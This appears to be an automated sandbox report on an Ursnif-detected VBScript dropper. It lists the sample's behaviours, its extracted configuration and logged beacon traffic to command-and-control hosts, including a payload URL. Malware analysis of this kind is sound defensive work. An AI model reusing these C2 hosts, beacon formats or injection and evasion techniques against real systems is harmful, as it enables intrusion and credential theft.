Analysis Report PtgzM1Gd04Up.vbs

Overview

General Information

Sample Name: PtgzM1Gd04Up.vbs
Analysis ID: 284873
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Avira: detection malicious, Label: TR/Kryptik.fklcr
Found malware configuration
Source: explorer.exe.3508.29.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}
Multi AV Scanner detection for domain / URL
Source: api3.lepini.at Virustotal: Detection: 6% Perma Link
Source: api10.laptok.at Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\Temp\ogress.psd ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: PtgzM1Gd04Up.vbs Virustotal: Detection: 19% Perma Link
Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW, 29_2_04D0FD7C
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
Found Tor onion address
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsfO9WibRs/z5SQzweKlMCW_2Bf/r3FHVUdIQ7_2B2F/4OggET4YVDlHnn9cEt/R_2FbmgPY/r_2B9Ijs2bxGBYWN157X/EHLvOSxdZEysAMq3hvU/MO7ssYO3b9BR2qwc73_2BM/qSiRGq20QKCka/MMWlF28y/KLXW_2BJT56aQAQ7YU8EjqN/2JsZzAR8j1/xbv8cnzdbfuDeI002/Z_0A_0Du4aCB/iVnAW6cFBzY/T9beXtW5wNqhrT/3IUVp4YjtpqX/o44VY HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ejOutO4MWBnDs5A4maeYdF/TBoJIgwOCHRt8/zoJ_2FqC/ObYSEQUT98biFMg2p_2FLGO/Xe2sFFEt_2/BXVMVxynFtgTL14VJ/FomSQ9vCfuSu/ZDzzaPIbP4h/UGxi94rwNTQaqm/5H4Z_2BzYq0JgTNSAUiFj/AI1qd5OmqqcNF1YR/Y9f6ejd6eQItj7o/6e_2BlTQlKCx6vht_0/A_0D_2FkX/2mc9WbUuipCdNpIesLm7/AmJocubwsIxSN8THOau/P2krAXI1XX1cFN9bNtH7jO/c5jZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPBhUkWhjObIGcRm4pOg/X2ghSrkPNJ/BFV3PYkVSqynhIZX0/z8cw3abh6ejc/qRsdswbWqP7/MozmpHSBnTRSly/muxskxDd4VCkj_2FZq9_2/FrmSrVCRtfsyaBuq/3Rbvb2aOOviCSur/3TAMqR4wgwK79P_2BX/um60KPfM1/n1uToq7rUKSO_2FCOBeY/jezBVFJCh_2FrZ_0A_0/DMhAHfv9uMKeCVVA7pZkld/wK9Z7iNRykPb1/EH4FQici/0vYDr4GEFcCM3JZanZOshh9/HY1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/8C7l82RZD/IPNx_2BA6NUS8m1Meo_2/Fas2lkcyOv4_2FyXQQA/W0ZQwXgbdYzfWai3c5CkbI/em5fguyn1S8ys/vpVw9dvD/khZPTWdEQCV0N5AR0qa1YOQ/LvEPSTN_2F/zlA2gt8ynYhIMOHfr/IASIpnbuTOlg/DdcZGi8WPYI/NR3mJxPuW34_2F/az5LW_2FJU_2BFw_2FsqB/vWjp2JDa_2Fg14a2/OTYnqh9mlzVPBkV/fSy7aPAm0_2BP4YyPN/c8k0VMTpv/7Lv8jSScGYAfEur_0A_0/DYV_2Fv17qFzbgLKlQu/3u2R7Gz5WRVQ7nkvK55OrO/9i9B3_2BMh/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/n3L9lcGQWucW/ej8OoZYqYIS/qXKKw05yNY8m6C/sIwmpsT57_2BC61WFCPNP/yRuWmkpJOA5akf0b/bNLsbtLqpQ29JXE/GP5k1v91FymLa5DQtI/OCDbHUhQZ/fcbJOzIIFU9rJvmqoBnO/w0gRKfdB79tXuhFoLvP/d2sQ3SKwyUaMPAHzUDn1AD/_2FGn_2Bm3otg/2r86MlCl/Hj4_2F2OwjgRkb0nTVl3z6Q/0WYrmJnvEh/4MpDHwU2mFKd8OikK/_2BbtrY5iV9f/mS_0A_0Dmze/1NUYbLxCWeOqq3/MzK7cHLvfsovO5hnqCChW/oWreT_2B/ViD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Host: api3.lepini.at
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579c9ee9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579d62c9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579e3bd2,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.13.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579ec4f1,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/UIQiXLAMLg4t/Rxi8q7e6zSs/ppLkAThUDmfSS4/yOwm_2Fga2xC15DtBLwwh/NmjWIzvmns9CddET/_2BZ8hEeadvYwxh/uFd3lt60_2FyFVn_2B/iXlprICf_/2B45OhMJZjYIDjqw_2Fm/eJGvB3vDUzSSCsuPGEa/M5YE6Mv5RHrzGnZcbFsa5w/jziyOzx_2FuIu/uDOGy6Dr/GOjy4MP82vBaLdGCF5ixS2x/rbQcfTwYvE/gJjw4kL5BH7Kw6DJX/9XhSSfgVL_2B/BdxG6AZO_0A/_0Dtw28OxMea_2/Ff8pUZzLyl3SHdNWDlXEm/PFk1VIj4/S9_2B75z5/EF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Sep 2020 23:23:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {81817910-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DFF147473DA56FBCCD.TMP.13.dr String found in binary or memory: http://api10.laptok.at/api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsf
Source: {81817912-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr String found in binary or memory: http://api10.laptok.at/api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ej
Source: explorer.exe, 0000001D.00000000.558338655.0000000007E1D000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3
Source: explorer.exe, 0000001D.00000000.544734516.0000000000E60000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/x
Source: {81817914-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DF637F64B7AC0A53C0.TMP.13.dr String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPB
Source: explorer.exe, 0000001D.00000003.591331392.000000000F2D0000.00000004.00000040.sdmp String found in binary or memory: http://api10.laptok.at/favicon.icoyu1SPS
Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/gs-
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmp String found in binary or memory: http://chat.allager.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.560164145.000000000E1DB000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
